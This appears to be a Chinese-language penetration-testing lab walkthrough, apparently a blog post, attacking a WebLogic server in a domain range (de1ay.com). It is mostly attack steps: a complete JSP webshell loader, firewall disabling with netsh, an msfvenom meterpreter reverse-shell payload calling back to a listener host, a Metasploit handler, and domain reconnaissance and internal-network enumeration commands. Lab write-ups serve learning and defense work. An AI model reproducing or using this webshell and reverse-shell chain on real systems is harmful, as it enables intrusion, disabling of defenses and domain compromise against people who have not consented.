#利用工具上传小马 java -jar Java反序列化漏洞利用工具V1.7.jar #获取当前路径 echo %cd% C:\Oracle\Middleware\user_projects\domains\base_domain #上传jsp木马 <%! class U extends ClassLoader { U(ClassLoader c) { super(c); } public Class g(byte[] b) { return super.defineClass(b, 0, b.length); } } public byte[] base64Decode(String str) throws Exception { try { Class clazz = Class.forName("sun.misc.BASE64Decoder"); return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str); } catch (Exception e) { Class clazz = Class.forName("java.util.Base64"); Object decoder = clazz.getMethod("getDecoder").invoke(null); return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str); } } %> <% String cls = request.getParameter("passwd"); if (cls != null) { new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext); } %> #密码为psswd
蚁剑连接木马
1 2 3 4 5 6 7 8
#打开蚁剑连接小马 #蚁剑虚拟终端 #发现我们已经是administrator用户 #关闭win防火墙 netsh advfirewall set allprofiles state off #查看防火墙配置状态 netsh advfirewall show allprofile state #虽然是乱码,但我们仍可以看出防火墙已关闭
#创建后门程序 msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.43.33 LPORT=10888 -f exe -o 233.exe #开启监听,设置sessions use exp/multi/handler set payload windows/x64/meterpreter_reverse_tcp set lhost 33 set lport 10888 run #蚁剑上传
MSF监听大马
1 2 3 4
run #发现我们只拿到了几十秒的shell,就被杀了 #由于博主无计可施,再加上靶场环境总有些问题 #博主尝试最后一种方法:进程迁移提权
#利用msf进行信息收集 查看当前域,定位域控 net time /domain 查看当前主机网卡 ipconfig /all 查询域管理员 net group "domain admins" /domain 查看计算机名、全名、用户名、系统版本、工作站、域、登录域 net config Workstation 打印路由信息,查看域网段 route print 查看域内账户 net user /domain ------------------------------- #利用MSF进行内网信息收集 run post/windows/gather/enum_ad_computers 查看域内成员 run post/windows/gather/enum_domain 查看域控 run post/multi/manage/autoroute 新建路由 use post/windows/gather/arp_scanner 探测内网存活主机 ------------------------------ 域名:delay.com 域控:dc.de1ay.com [10.10.10.10] 域内主机:DC. WEB. 域内账户:Administrator,de1ay,Guest,krbtgt,mssql